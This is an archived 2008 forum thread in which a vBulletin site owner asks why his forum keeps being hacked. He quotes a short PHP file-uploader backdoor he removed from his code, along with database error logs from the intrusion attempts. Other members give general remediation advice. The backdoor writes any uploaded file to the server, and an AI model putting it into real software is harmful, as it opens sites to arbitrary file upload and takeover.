PDA

View Full Version : Potential Exploit in VB 3.7.1?


pspcrazy
05-28-2008, 07:34 PM
Hi as of late they have been a hacker that's been messing with my site. I removed some code which he placed into my code the last time he hacked:

<?php $ficnt = @fread(@fopen($_FILES["s"]["tmp_name"], "rb"), $_FILES["s"]["size"]);
if(@fwrite(@fopen($_FILES["s"]["name"], "wb"), $ficnt)) echo $_FILES["s"]["name"]; ?>

Don't know what it does but i know it's not supposed to be there.

Oddly though now he's doing something else and i'm getting a lot of sql errors like:

Database error in vBulletin 3.7.1:

Invalid SQL:

SELECT COUNT(*) AS count
FROM vbattachment
WHERE posthash = 'invalid posthash'
AND userid = 0;

MySQL Error : Lost connection to MySQL server during query
Error Number : 2013
Request Date : Wednesday, May 28th 2008 @ 03:14:25 PM
Error Date : Wednesday, May 28th 2008 @ 03:15:04 PM
Script : http://www.animecrazy.net/forums/newreply.php?do=postreply&t=1607
Referrer : http://www.animecrazy.net/forums/newreply.php?do=newreply&noquote=1&p=3625
IP Address : 24.47.55.108
Username : crack
Classname : vB_Database


which only occur when he tries to hack me and the username crack remains the same but the ip changes mabye 10 different times per minute very odd.

Anyone have any ideas as to what he's doing?

Mark.B
05-28-2008, 07:54 PM
Sounds like he hacked the server rather than vB.

pspcrazy
05-28-2008, 08:32 PM
The first time he apparently knew an admin's password but we replaced all the passwords and removed all the anomalies, so I doubt it's a server problem at this point. But hey I might be wrong.

Princeton
05-29-2008, 12:20 PM
I suggest checking for files that do not belong and check your files for any further edits.

Your best bet is to hire someone that can look into this.

pspcrazy
05-29-2008, 03:13 PM
Got any ideas on who? Have any experience with seeksadmin.com ?